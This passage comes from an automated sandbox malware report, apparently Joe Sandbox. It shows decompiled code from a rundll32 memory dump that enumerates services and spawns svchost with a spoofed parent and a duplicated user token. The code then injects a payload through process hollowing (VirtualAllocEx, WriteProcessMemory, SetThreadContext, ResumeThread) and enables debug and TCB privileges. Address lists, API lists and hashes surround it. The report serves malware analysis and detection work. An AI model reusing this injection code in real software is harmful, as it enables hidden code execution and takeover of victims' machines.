                                                                                              										_t455 = _t453 + _t319 * 2 + 2;
                                                                                              										E0427E060(_v3132 + _t455, _t395, 2 + lstrlenW(_t395) * 2);
                                                                                              										_t325 = lstrlenW(_t395);
                                                                                              										_t396 = _v3184;
                                                                                              										_t457 = _t455 + _t325 * 2 + 2;
                                                                                              										E0427E060(_v3132 + _t457, _t396, 2 + lstrlenW(_t396) * 2);
                                                                                              										_t459 = _t457 + lstrlenW(_t396) * 2 + 2;
                                                                                              										_t333 = lstrlenW( &_v1568);
                                                                                              										_t397 = _v3132;
                                                                                              										E0427E060(_t459 + _v3132,  &_v1568, 2 + _t333 * 2);
                                                                                              										_t461 = _t459 + lstrlenW( &_v1568) * 2 + 2;
                                                                                              										E0427E060(_t461 + _v3132,  &_v2088, 2 + lstrlenW( &_v2088) * 2);
                                                                                              										_t463 = _t461 + lstrlenW( &_v2088) * 2 + 2;
                                                                                              										E0427E060(_t463 + _t397,  &_v2608, 2 + lstrlenW( &_v2608) * 2);
                                                                                              										_t475 = _t477 + 0x84;
                                                                                              										_t355 = lstrlenW( &_v2608);
                                                                                              										_t423 =  &(_v3200[0]);
                                                                                              										_t390 = _v3160;
                                                                                              										_t402 =  &(_v3136[0xb]);
                                                                                              										_v3200 = _t423;
                                                                                              										_t225 = _t463 + (_t355 + 1) * 2;
                                                                                              										_v3136 = _t402;
                                                                                              										_v3148 = _t225;
                                                                                              									} while (_t423 < _v3152);
                                                                                              								}
                                                                                              								LocalReAlloc(_v3132, _t225, 0x42);
                                                                                              								LocalFree(_v3144);
                                                                                              								LocalFree(_t390);
                                                                                              								LocalFree(_v3208);
                                                                                              								CloseServiceHandle(_v3204);
                                                                                              								return E04275AFE(_v8 ^ _t473);
                                                                                              							} else {
                                                                                              								CloseServiceHandle(_t389);
                                                                                              								LocalFree(_t426);
                                                                                              								return E04275AFE(_v8 ^ _t473);
                                                                                              							}
                                                                                              						} else {
                                                                                              							CloseServiceHandle(_t389);
                                                                                              							return E04275AFE(_v8 ^ _t473);
                                                                                              						}
                                                                                              					} else {
                                                                                              						CloseServiceHandle(_t389);
                                                                                              						goto L3;
                                                                                              					}
                                                                                              				}
                                                                                              			}

























































































                                                                                              0x04262fb9
                                                                                              0x04262fc0
                                                                                              0x04262fcd
                                                                                              0x04262fd7
                                                                                              0x04262fe1
                                                                                              0x04262ff1
                                                                                              0x04262ff3
                                                                                              0x04262ffb
                                                                                              0x04263036
                                                                                              0x04263046
                                                                                              0x04262ffd
                                                                                              0x0426301f
                                                                                              0x04263025
                                                                                              0x0426302d
                                                                                              0x0426304e
                                                                                              0x04263055
                                                                                              0x0426305d
                                                                                              0x0426305f
                                                                                              0x04263067
                                                                                              0x0426308b
                                                                                              0x0426309d
                                                                                              0x042630b2
                                                                                              0x042630ba
                                                                                              0x042630e4
                                                                                              0x042630ed
                                                                                              0x042630f3
                                                                                              0x042630f6
                                                                                              0x04263107
                                                                                              0x04263109
                                                                                              0x04263115
                                                                                              0x04263122
                                                                                              0x04263131
                                                                                              0x04263136
                                                                                              0x04263139
                                                                                              0x0426314a
                                                                                              0x04263702
                                                                                              0x04263150
                                                                                              0x04263150
                                                                                              0x04263156
                                                                                              0x04263158
                                                                                              0x04263160
                                                                                              0x04263166
                                                                                              0x0426316d
                                                                                              0x04263177
                                                                                              0x0426317d
                                                                                              0x04263181
                                                                                              0x0426318d
                                                                                              0x04263193
                                                                                              0x04263199
                                                                                              0x0426319f
                                                                                              0x042631a7
                                                                                              0x0426324f
                                                                                              0x042631ad
                                                                                              0x042631ad
                                                                                              0x042631c3
                                                                                              0x042631cd
                                                                                              0x042631d8
                                                                                              0x042631db
                                                                                              0x042631e0
                                                                                              0x042631e6
                                                                                              0x042631e9
                                                                                              0x042631ec
                                                                                              0x042631f9
                                                                                              0x042631ff
                                                                                              0x0426320c
                                                                                              0x0426320f
                                                                                              0x0426320f
                                                                                              0x04263215
                                                                                              0x04263230
                                                                                              0x04263239
                                                                                              0x0426323b
                                                                                              0x0426323b
                                                                                              0x04263247
                                                                                              0x04263247
                                                                                              0x04263263
                                                                                              0x04263276
                                                                                              0x0426328f
                                                                                              0x04263297
                                                                                              0x042632a7
                                                                                              0x042632b4
                                                                                              0x042632b9
                                                                                              0x042632bc
                                                                                              0x042632e8
                                                                                              0x04263388
                                                                                              0x04263388
                                                                                              0x04263391
                                                                                              0x042633b0
                                                                                              0x042633b5
                                                                                              0x042632ee
                                                                                              0x04263310
                                                                                              0x0426331e
                                                                                              0x04263329
                                                                                              0x0426332c
                                                                                              0x04263332
                                                                                              0x04263340
                                                                                              0x00000000
                                                                                              0x0426334b
                                                                                              0x0426335e
                                                                                              0x0426337e
                                                                                              0x04263383
                                                                                              0x04263383
                                                                                              0x04263340
                                                                                              0x042633b8
                                                                                              0x042633c8
                                                                                              0x042633ce
                                                                                              0x042633d9
                                                                                              0x042633e3
                                                                                              0x042633ed
                                                                                              0x042633f7
                                                                                              0x042633f9
                                                                                              0x04263402
                                                                                              0x0426340d
                                                                                              0x04263418
                                                                                              0x04263423
                                                                                              0x0426342e
                                                                                              0x0426343f
                                                                                              0x04263446
                                                                                              0x0426344c
                                                                                              0x04263452
                                                                                              0x0426345a
                                                                                              0x04263466
                                                                                              0x04263466
                                                                                              0x0426346c
                                                                                              0x0426348d
                                                                                              0x042634a2
                                                                                              0x042634ca
                                                                                              0x042634e6
                                                                                              0x04263506
                                                                                              0x04263516
                                                                                              0x04263518
                                                                                              0x0426351f
                                                                                              0x04263528
                                                                                              0x0426352c
                                                                                              0x04263531
                                                                                              0x04263535
                                                                                              0x0426353d
                                                                                              0x04263547
                                                                                              0x0426354b
                                                                                              0x04263562
                                                                                              0x04263576
                                                                                              0x04263594
                                                                                              0x042635a3
                                                                                              0x042635a5
                                                                                              0x042635af
                                                                                              0x042635c6
                                                                                              0x042635cf
                                                                                              0x042635d1
                                                                                              0x042635db
                                                                                              0x042635f2
                                                                                              0x042635fb
                                                                                              0x042635fd
                                                                                              0x04263607
                                                                                              0x0426361e
                                                                                              0x04263633
                                                                                              0x04263636
                                                                                              0x04263638
                                                                                              0x04263651
                                                                                              0x0426366c
                                                                                              0x04263684
                                                                                              0x0426369f
                                                                                              0x042636b7
                                                                                              0x042636bc
                                                                                              0x042636c6
                                                                                              0x042636d5
                                                                                              0x042636d6
                                                                                              0x042636dc
                                                                                              0x042636df
                                                                                              0x042636e5
                                                                                              0x042636e8
                                                                                              0x042636ee
                                                                                              0x042636f4
                                                                                              0x04263700
                                                                                              0x04263710
                                                                                              0x04263724
                                                                                              0x04263727
                                                                                              0x0426372f
                                                                                              0x04263737
                                                                                              0x0426374f
                                                                                              0x042630bc
                                                                                              0x042630bd
                                                                                              0x042630c4
                                                                                              0x042630dc
                                                                                              0x042630dc
                                                                                              0x04263069
                                                                                              0x0426306a
                                                                                              0x04263082
                                                                                              0x04263082
                                                                                              0x0426302f
                                                                                              0x04263030
                                                                                              0x00000000
                                                                                              0x04263030
                                                                                              0x0426302d

                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04262FEB
                                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0426301F
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 04263030
                                                                                              • LocalAlloc.KERNEL32(00000040,-0000002C), ref: 0426305B
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 0426306A
                                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 042630B2
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 042630BD
                                                                                              • LocalFree.KERNEL32(00000000), ref: 042630C4
                                                                                              • LocalAlloc.KERNEL32(00000040,00019000), ref: 042630E4
                                                                                              • LocalAlloc.KERNEL32(00000040,00002000), ref: 04263100
                                                                                              • LocalAlloc.KERNEL32(00000040,00002000), ref: 0426311B
                                                                                              • OpenServiceW.ADVAPI32(?,00000000,00000001), ref: 04263199
                                                                                              • QueryServiceConfigW.ADVAPI32(00000000,00000000,00002000,00000000), ref: 042631BB
                                                                                              • QueryServiceConfig2W.ADVAPI32(?,00000001,?,00002000,00000000), ref: 04263230
                                                                                              • CloseServiceHandle.ADVAPI32(?), ref: 04263247
                                                                                              Strings
                                                                                              • ServiceDll, xrefs: 04263305
                                                                                              • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 04263289
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$Local$AllocCloseHandle$EnumOpenQueryServicesStatus$ConfigConfig2FreeManager
                                                                                              • String ID: SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                                                              • API String ID: 703603788-2144606380
                                                                                              • Opcode ID: 9b038a1fa617eaf6cbb2e4358dc466508068182518bd53cb424ae419d897a86e
                                                                                              • Instruction ID: d277385c50212e1408b936bf9b03c6af2bace62e17ad68d87ddba54da6a71e84
                                                                                              • Opcode Fuzzy Hash: 9b038a1fa617eaf6cbb2e4358dc466508068182518bd53cb424ae419d897a86e
                                                                                              • Instruction Fuzzy Hash: C0223EB2A1022CABEB25DB68DC85F9AB7B8EF44304F1042D5E509E7151DF35AE94CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E04269910(void* __ecx, long __edx) {
                                                                                              				signed int _v12;
                                                                                              				short _v536;
                                                                                              				short _v1056;
                                                                                              				void* _v1332;
                                                                                              				struct _OSVERSIONINFOW _v1336;
                                                                                              				struct _CONTEXT _v2056;
                                                                                              				long _v2060;
                                                                                              				void* _v2064;
                                                                                              				void* _v2068;
                                                                                              				void* _v2072;
                                                                                              				int _v2076;
                                                                                              				void* _v2080;
                                                                                              				void* _v2084;
                                                                                              				struct _PROCESS_INFORMATION _v2100;
                                                                                              				void* _v2104;
                                                                                              				void _v2108;
                                                                                              				long _v2112;
                                                                                              				void* _v2116;
                                                                                              				long _v2120;
                                                                                              				intOrPtr _v2124;
                                                                                              				struct _STARTUPINFOW _v2192;
                                                                                              				void* _v2216;
                                                                                              				void* _v2220;
                                                                                              				char _v2224;
                                                                                              				void* _v2228;
                                                                                              				char _v2232;
                                                                                              				long _v2236;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t111;
                                                                                              				long _t119;
                                                                                              				signed int _t121;
                                                                                              				void* _t129;
                                                                                              				void* _t136;
                                                                                              				void* _t139;
                                                                                              				long _t140;
                                                                                              				_Unknown_base(*)()* _t146;
                                                                                              				signed int _t154;
                                                                                              				signed int _t155;
                                                                                              				_Unknown_base(*)()* _t157;
                                                                                              				void* _t160;
                                                                                              				void* _t167;
                                                                                              				void* _t170;
                                                                                              				void* _t174;
                                                                                              				void* _t179;
                                                                                              				void* _t182;
                                                                                              				long _t185;
                                                                                              				void* _t186;
                                                                                              				void* _t188;
                                                                                              				void* _t195;
                                                                                              				void* _t201;
                                                                                              				long _t202;
                                                                                              				void* _t211;
                                                                                              				intOrPtr _t218;
                                                                                              				void* _t225;
                                                                                              				void* _t226;
                                                                                              				long _t227;
                                                                                              				intOrPtr _t228;
                                                                                              				void* _t229;
                                                                                              				void* _t230;
                                                                                              				intOrPtr* _t231;
                                                                                              				void* _t238;
                                                                                              				intOrPtr* _t240;
                                                                                              				intOrPtr* _t241;
                                                                                              				void* _t260;
                                                                                              				void* _t264;
                                                                                              				void* _t266;
                                                                                              				void* _t267;
                                                                                              				long _t268;
                                                                                              				void* _t269;
                                                                                              				void* _t272;
                                                                                              				intOrPtr* _t274;
                                                                                              				intOrPtr* _t275;
                                                                                              				void* _t277;
                                                                                              				void* _t280;
                                                                                              				void* _t281;
                                                                                              				void* _t287;
                                                                                              				signed int _t290;
                                                                                              				void* _t292;
                                                                                              				signed int _t294;
                                                                                              				void* _t298;
                                                                                              				long _t303;
                                                                                              
                                                                                              				_t233 = __ecx;
                                                                                              				_t111 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t111 ^ _t290;
                                                                                              				_v2112 = __edx;
                                                                                              				_v2116 = __ecx;
                                                                                              				E0427DEA0(_t264,  &_v2192, 0, 0x48);
                                                                                              				_v2192.cb = 0x48;
                                                                                              				_t275 = 0;
                                                                                              				_v2060 = 0xc;
                                                                                              				_v2076 = 0;
                                                                                              				asm("xorps xmm0, xmm0");
                                                                                              				_v2064 = 0;
                                                                                              				asm("movups [ebp-0x830], xmm0");
                                                                                              				_v2084 = 0;
                                                                                              				E0427DEA0(_t264,  &_v1336, 0, 0x114);
                                                                                              				_t294 = _t292 + 0x18;
                                                                                              				_v1336.dwOSVersionInfoSize = 0x114;
                                                                                              				GetVersionExW( &_v1336);
                                                                                              				asm("sbb ebx, ebx");
                                                                                              				_t226 = _t225 + 1;
                                                                                              				_t119 = E04265CA0(_t226, _t264, 0);
                                                                                              				if(_t119 == 0) {
                                                                                              					_t119 = E04265D40(_t264, 0);
                                                                                              					_t303 = _t119;
                                                                                              				}
                                                                                              				if(_t303 != 0 && _t226 != 0) {
                                                                                              					_t211 = OpenProcess(0x1fffff, 0, _t119);
                                                                                              					_v2084 = _t211;
                                                                                              					if(_t211 != 0) {
                                                                                              						_t275 = GetProcAddress(LoadLibraryA("kernel32.dll"), "InitializeProcThreadAttributeList");
                                                                                              						_t274 = GetProcAddress(LoadLibraryA("kernel32.dll"), "UpdateProcThreadAttribute");
                                                                                              						if(_t274 != 0) {
                                                                                              							_t307 = _t275;
                                                                                              							if(_t275 != 0) {
                                                                                              								 *_t275(0, 1, 0,  &_v2076);
                                                                                              								_push(_v2076);
                                                                                              								_t218 = E04275B55(_t233, _t275, _t307);
                                                                                              								_t294 = _t294 + 4;
                                                                                              								_v2064 = _t218;
                                                                                              								_push( &_v2076);
                                                                                              								_push(0);
                                                                                              								_push(1);
                                                                                              								_push(_t218);
                                                                                              								if( *_t275() == 0) {
                                                                                              									_push(_v2064);
                                                                                              									goto L12;
                                                                                              								} else {
                                                                                              									_t275 = _v2064;
                                                                                              									_push(0);
                                                                                              									_push(0);
                                                                                              									_push(4);
                                                                                              									_push( &_v2084);
                                                                                              									_push(0x20000);
                                                                                              									_push(0);
                                                                                              									_push(_t275);
                                                                                              									if( *_t274() == 0) {
                                                                                              										_push(_t275);
                                                                                              										L12:
                                                                                              										E04275B0F();
                                                                                              										_t294 = _t294 + 4;
                                                                                              										__eflags = 0;
                                                                                              										_v2064 = 0;
                                                                                              									} else {
                                                                                              										_v2124 = _t275;
                                                                                              										_v2060 = 0x8000c;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				_t266 = 0;
                                                                                              				_t121 = GetSystemDirectoryW( &_v536, 0x104);
                                                                                              				if( *((short*)(_t290 + _t121 * 2 - 0x216)) == 0x5c) {
                                                                                              					L16:
                                                                                              					wsprintfW( &_v1056, L"%ssvchost.exe -k WspService",  &_v536);
                                                                                              					if(_t226 == 0) {
                                                                                              						L34:
                                                                                              						_t227 = _v2060;
                                                                                              						goto L35;
                                                                                              					} else {
                                                                                              						_v2080 = _t266;
                                                                                              						_v2104 = _t266;
                                                                                              						_t238 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSEnumerateSessionsW");
                                                                                              						_t229 = 0;
                                                                                              						_v2072 = _t238;
                                                                                              						while(1) {
                                                                                              							_push( &_v2104);
                                                                                              							_push( &_v2080);
                                                                                              							_push(1);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							if( *_t238() == 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							_t260 = _v2104;
                                                                                              							_t154 = 0;
                                                                                              							_t280 = _v2080;
                                                                                              							if(_t260 == 0) {
                                                                                              								L25:
                                                                                              								_t155 = 0;
                                                                                              								if(_t260 != 0) {
                                                                                              									_t240 = _t280 + 8;
                                                                                              									while( *_t240 != 1) {
                                                                                              										_t155 = _t155 + 1;
                                                                                              										_t240 = _t240 + 0xc;
                                                                                              										if(_t155 < _t260) {
                                                                                              											continue;
                                                                                              										} else {
                                                                                              										}
                                                                                              										goto L31;
                                                                                              									}
                                                                                              									_t266 =  *(_t280 + (_t155 + _t155 * 2) * 4);
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t241 = _t280 + 8;
                                                                                              								while( *_t241 != 0) {
                                                                                              									_t154 = _t154 + 1;
                                                                                              									_t241 = _t241 + 0xc;
                                                                                              									if(_t154 < _t260) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										goto L25;
                                                                                              									}
                                                                                              									goto L31;
                                                                                              								}
                                                                                              								_t266 =  *(_t280 + (_t154 + _t154 * 2) * 4);
                                                                                              								__eflags = _t266;
                                                                                              								if(_t266 == 0) {
                                                                                              									goto L25;
                                                                                              								}
                                                                                              							}
                                                                                              							L31:
                                                                                              							_t157 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSFreeMemory");
                                                                                              							 *_t157(_v2080);
                                                                                              							if(_t266 != 0) {
                                                                                              								_v2108 = _t266;
                                                                                              								_v2072 = 0;
                                                                                              								_v2068 = 0;
                                                                                              								_t160 = OpenProcessToken(GetCurrentProcess(), 0xb,  &_v2072);
                                                                                              								__eflags = _t160;
                                                                                              								if(_t160 != 0) {
                                                                                              									_t167 = DuplicateTokenEx(_v2072, 0x2000000, 0, 0, 1,  &_v2068);
                                                                                              									__eflags = _t167;
                                                                                              									if(_t167 != 0) {
                                                                                              										_t170 = SetTokenInformation(_v2068, 0xc,  &_v2108, 4);
                                                                                              										__eflags = _t170;
                                                                                              										if(_t170 == 0) {
                                                                                              											CloseHandle(_v2068);
                                                                                              											_v2068 = 0;
                                                                                              										}
                                                                                              									}
                                                                                              									CloseHandle(_v2072);
                                                                                              								}
                                                                                              								_t281 = _v2068;
                                                                                              								_t227 = _v2060;
                                                                                              								__eflags = _t281;
                                                                                              								if(_t281 == 0) {
                                                                                              									goto L35;
                                                                                              								} else {
                                                                                              									_t267 = CreateProcessAsUserW(_t281, 0,  &_v1056, 0, 0, 0, _t227, 0, 0,  &_v2192,  &_v2100);
                                                                                              									CloseHandle(_t281);
                                                                                              									__eflags = _t267;
                                                                                              									if(_t267 == 0) {
                                                                                              										L35:
                                                                                              										_t267 = CreateProcessW(0,  &_v1056, 0, 0, 0, _t227, 0, 0,  &_v2192,  &_v2100);
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								Sleep(0xbb8);
                                                                                              								_t238 = _v2072;
                                                                                              								_t229 = _t229 + 1;
                                                                                              								if(_t229 < 0xa) {
                                                                                              									continue;
                                                                                              								} else {
                                                                                              									break;
                                                                                              								}
                                                                                              							}
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						goto L34;
                                                                                              					}
                                                                                              					L36:
                                                                                              					_t228 = _v2064;
                                                                                              					if(_t228 != 0) {
                                                                                              						_t146 = GetProcAddress(LoadLibraryA("kernel32.dll"), "DeleteProcThreadAttributeList");
                                                                                              						if(_t146 != 0) {
                                                                                              							 *_t146(_t228);
                                                                                              						}
                                                                                              						_push(1);
                                                                                              						E04275B47(_t228);
                                                                                              					}
                                                                                              					_t129 = _v2084;
                                                                                              					if(_t129 != 0) {
                                                                                              						CloseHandle(_t129);
                                                                                              					}
                                                                                              					if(_t267 == 0) {
                                                                                              						L46:
                                                                                              						return E04275AFE(_v12 ^ _t290);
                                                                                              					} else {
                                                                                              						_v2056.ContextFlags = 0x10007;
                                                                                              						if(GetThreadContext(_v2100.hThread,  &_v2056) == 0) {
                                                                                              							goto L46;
                                                                                              						} else {
                                                                                              							_t268 = _v2112;
                                                                                              							_t277 = VirtualAllocEx(_v2100.hProcess, 0, _t268, 0x3000, 0x40);
                                                                                              							if(_t277 != 0) {
                                                                                              								_t136 = WriteProcessMemory(_v2100.hProcess, _t277, _v2116, _t268,  &_v2120);
                                                                                              								__eflags = _t136;
                                                                                              								if(_t136 == 0) {
                                                                                              									goto L45;
                                                                                              								} else {
                                                                                              									_v2056.Eip = _t277;
                                                                                              									_t139 = SetThreadContext(_v2100.hThread,  &_v2056);
                                                                                              									__eflags = _t139;
                                                                                              									if(_t139 == 0) {
                                                                                              										goto L45;
                                                                                              									} else {
                                                                                              										_t140 = ResumeThread(_v2100.hThread);
                                                                                              										__eflags = _t140 - 0xffffffff;
                                                                                              										if(_t140 == 0xffffffff) {
                                                                                              											goto L45;
                                                                                              										} else {
                                                                                              											CloseHandle(_v2100.hThread);
                                                                                              											__eflags = _v12 ^ _t290;
                                                                                              											return E04275AFE(_v12 ^ _t290);
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								L45:
                                                                                              								TerminateProcess(_v2100, 0);
                                                                                              								goto L46;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					 *((short*)(_t290 + _t121 * 2 - 0x214)) = 0x5c;
                                                                                              					_t174 = 2 + _t121 * 2;
                                                                                              					if(_t174 >= 0x208) {
                                                                                              						E04275FD9();
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						_push(_t290);
                                                                                              						_t298 = (_t294 & 0xfffffff8) - 0x14;
                                                                                              						_push(_t226);
                                                                                              						_push(_t275);
                                                                                              						_push(0);
                                                                                              						_t269 = E0426ADD0(L"SeTcbPrivilege", _t275);
                                                                                              						_t286 = E0426ADD0(L"SeDebugPrivilege", _t275);
                                                                                              						_t230 = E0426AC90(L"SeIncreaseQuotaPrivilege", _t269, _t286);
                                                                                              						_t179 = E0426AC90(L"SeAssignPrimaryTokenPrivilege", _t269, _t286);
                                                                                              						__eflags = _t179;
                                                                                              						_t180 = Sleep;
                                                                                              						if(_t179 == 0) {
                                                                                              							Sleep(0x1388);
                                                                                              							_t180 = Sleep;
                                                                                              						}
                                                                                              						__eflags = _t230;
                                                                                              						if(_t230 == 0) {
                                                                                              							 *_t180(0xbb8);
                                                                                              						}
                                                                                              						_t231 = Sleep;
                                                                                              						__eflags = _t269;
                                                                                              						if(_t269 == 0) {
                                                                                              							Sleep(0x1388);
                                                                                              						}
                                                                                              						__eflags = _t286;
                                                                                              						if(__eflags == 0) {
                                                                                              							Sleep(0x1388);
                                                                                              						}
                                                                                              						_v2216 = 0;
                                                                                              						_v2220 = 0;
                                                                                              						E04269390(_t231,  &_v2224, _t269, _t286, __eflags, L"Dispatch");
                                                                                              						__eflags = _v2228;
                                                                                              						_t270 = CloseHandle;
                                                                                              						if(_v2228 != 0) {
                                                                                              							L82:
                                                                                              							_t287 = 0;
                                                                                              							__eflags = 0;
                                                                                              						} else {
                                                                                              							__eflags = _v2220;
                                                                                              							_t232 = WaitForSingleObject;
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L87;
                                                                                              							} else {
                                                                                              								_t202 = E042694D0(WaitForSingleObject, L"Dispatch", CloseHandle, _t286, __eflags);
                                                                                              								__eflags = _t202;
                                                                                              								if(__eflags == 0) {
                                                                                              									goto L87;
                                                                                              								} else {
                                                                                              									while(1) {
                                                                                              										__eflags = _t202 - 0x2fffffff;
                                                                                              										if(_t202 == 0x2fffffff) {
                                                                                              											break;
                                                                                              										}
                                                                                              										__eflags = _t202 - 0x1fffffff;
                                                                                              										if(_t202 == 0x1fffffff) {
                                                                                              											break;
                                                                                              										} else {
                                                                                              											_t286 = OpenThread(0x1fffff, 0, _t202);
                                                                                              											__eflags = _t286;
                                                                                              											if(__eflags == 0) {
                                                                                              												goto L87;
                                                                                              											} else {
                                                                                              												WaitForSingleObject(_t286, 0xffffffff);
                                                                                              												__eflags = GetExitCodeThread(_t286,  &_v2236);
                                                                                              												if(__eflags == 0) {
                                                                                              													L78:
                                                                                              													__eflags = E04269390(_t232,  &_v2232, _t270, _t286, __eflags, L"Dispatch");
                                                                                              													if(__eflags != 0) {
                                                                                              														goto L87;
                                                                                              													} else {
                                                                                              														_t202 = E042694D0(_t232, L"Dispatch", _t270, _t286, __eflags);
                                                                                              														__eflags = _t202;
                                                                                              														if(__eflags != 0) {
                                                                                              															continue;
                                                                                              														} else {
                                                                                              															while(1) {
                                                                                              																L87:
                                                                                              																_t185 = E042694D0(_t232, L"Control", _t270, _t286, __eflags);
                                                                                              																__eflags = _t185;
                                                                                              																if(__eflags == 0) {
                                                                                              																}
                                                                                              																L88:
                                                                                              																_v2236 = 0;
                                                                                              																_t188 = E04269620(_t232,  &_v2236, _t270, _t286, __eflags);
                                                                                              																_t271 = _t188;
                                                                                              																__eflags = _t188;
                                                                                              																if(__eflags == 0) {
                                                                                              																	L86:
                                                                                              																	_t270 = CloseHandle;
                                                                                              																} else {
                                                                                              																	_t261 = _v2236;
                                                                                              																	__eflags = _v2236;
                                                                                              																	if(__eflags == 0) {
                                                                                              																		goto L86;
                                                                                              																	} else {
                                                                                              																		_t286 = E04269910(_t271, _t261,  &_v2236);
                                                                                              																		E04275B0F(_t271);
                                                                                              																		_t270 = CloseHandle;
                                                                                              																		_t298 = _t298 + 8;
                                                                                              																		__eflags = _t286;
                                                                                              																		if(__eflags != 0) {
                                                                                              																			__eflags = WaitForSingleObject(_t286, 0xbb8) - 0x102;
                                                                                              																			if(__eflags == 0) {
                                                                                              																				CloseHandle(_t286);
                                                                                              																			}
                                                                                              																		}
                                                                                              																		while(1) {
                                                                                              																			L87:
                                                                                              																			_t185 = E042694D0(_t232, L"Control", _t270, _t286, __eflags);
                                                                                              																			__eflags = _t185;
                                                                                              																			if(__eflags == 0) {
                                                                                              																			}
                                                                                              																			goto L88;
                                                                                              																		}
                                                                                              																	}
                                                                                              																	while(1) {
                                                                                              																		L87:
                                                                                              																		_t185 = E042694D0(_t232, L"Control", _t270, _t286, __eflags);
                                                                                              																		__eflags = _t185;
                                                                                              																		if(__eflags == 0) {
                                                                                              																		}
                                                                                              																		goto L93;
                                                                                              																	}
                                                                                              																	goto L88;
                                                                                              																}
                                                                                              																continue;
                                                                                              																L93:
                                                                                              																__eflags = _t185 - 0x1fffffff;
                                                                                              																if(_t185 == 0x1fffffff) {
                                                                                              																	do {
                                                                                              																		_t186 = SetConsoleCtrlHandler(E0426AAF0, 0);
                                                                                              																		__eflags = _t186;
                                                                                              																	} while (_t186 != 0);
                                                                                              																	_t287 = 0x315;
                                                                                              																} else {
                                                                                              																	__eflags = _t185 - 0x2fffffff;
                                                                                              																	if(__eflags != 0) {
                                                                                              																		_t286 = OpenThread(0x1fffff, 0, _t185);
                                                                                              																		__eflags = _t286;
                                                                                              																		if(__eflags == 0) {
                                                                                              																			goto L88;
                                                                                              																		} else {
                                                                                              																			WaitForSingleObject(_t286, 0xffffffff);
                                                                                              																			CloseHandle(_t286);
                                                                                              																		}
                                                                                              																		continue;
                                                                                              																	} else {
                                                                                              																		Sleep(0x7d0);
                                                                                              																		_v2228 = 0;
                                                                                              																		_t195 = E04269620(_t232,  &_v2228, _t270, _t286, __eflags);
                                                                                              																		_t286 = _t195;
                                                                                              																		__eflags = _t195;
                                                                                              																		if(__eflags == 0) {
                                                                                              																			continue;
                                                                                              																		} else {
                                                                                              																			_t262 = _v2228;
                                                                                              																			__eflags = _v2228;
                                                                                              																			if(__eflags == 0) {
                                                                                              																				continue;
                                                                                              																			} else {
                                                                                              																				_t272 = E04269910(_t286, _t262,  &_v2228);
                                                                                              																				E04275B0F(_t286);
                                                                                              																				_t298 = _t298 + 8;
                                                                                              																				__eflags = _t272;
                                                                                              																				if(__eflags == 0) {
                                                                                              																					goto L86;
                                                                                              																				} else {
                                                                                              																					__eflags = WaitForSingleObject(_t272, 0xbb8) - 0x102;
                                                                                              																					if(__eflags != 0) {
                                                                                              																						goto L86;
                                                                                              																					} else {
                                                                                              																						CloseHandle(_t272);
                                                                                              																						E042578B0(_t232, L"Dispatch", 0x2fffffff, CloseHandle, _t286, __eflags);
                                                                                              																						do {
                                                                                              																							_t201 = SetConsoleCtrlHandler(E0426AAF0, 0);
                                                                                              																							__eflags = _t201;
                                                                                              																						} while (_t201 != 0);
                                                                                              																						_t287 = 0x315;
                                                                                              																					}
                                                                                              																				}
                                                                                              																			}
                                                                                              																		}
                                                                                              																	}
                                                                                              																}
                                                                                              																goto L83;
                                                                                              															}
                                                                                              														}
                                                                                              													}
                                                                                              												} else {
                                                                                              													__eflags = _v2236 - 0x315;
                                                                                              													if(__eflags == 0) {
                                                                                              														goto L82;
                                                                                              													} else {
                                                                                              														goto L78;
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              										goto L83;
                                                                                              									}
                                                                                              									E0426AAD0();
                                                                                              									goto L82;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						L83:
                                                                                              						_t182 = _v2216;
                                                                                              						__eflags = _t182;
                                                                                              						if(_t182 != 0) {
                                                                                              							CloseHandle(_t182);
                                                                                              						}
                                                                                              						return _t287;
                                                                                              					} else {
                                                                                              						 *((short*)(_t290 + _t174 - 0x214)) = 0;
                                                                                              						goto L16;
                                                                                              					}
                                                                                              				}
                                                                                              			}






















































































                                                                                              0x04269910
                                                                                              0x04269919
